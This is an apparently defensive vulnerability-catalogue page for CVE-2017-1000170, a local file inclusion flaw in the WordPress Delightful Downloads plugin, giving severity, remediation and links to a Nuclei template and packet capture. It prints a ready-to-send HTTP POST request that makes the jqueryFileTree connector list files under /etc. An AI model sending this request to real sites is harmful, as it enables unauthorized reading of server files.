🔙 목록으로 돌아가기

CVE-2017-1000170: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion

TitleWordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
Authordwisiswant0
SeverityHigh
ImpactAllows an attacker to include arbitrary local files, potentially leading to unauthorized access or code execution.
RemediationUpdate to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor.
CVSS Score7.5
EPSS Score0.8999
CVE IDCVE-2017-1000170
CWE IDCWE-22
Tags cve2017 cve wordpress wp-plugin lfi jquery edb packetstorm jqueryfiletree_project vkev vuln

🔍 Vulnerability Description

WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.

🌐 HTTP Request

POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 28
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

dir=%2Fetc%2F&onlyFiles=true

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-1000170.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-1000170.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A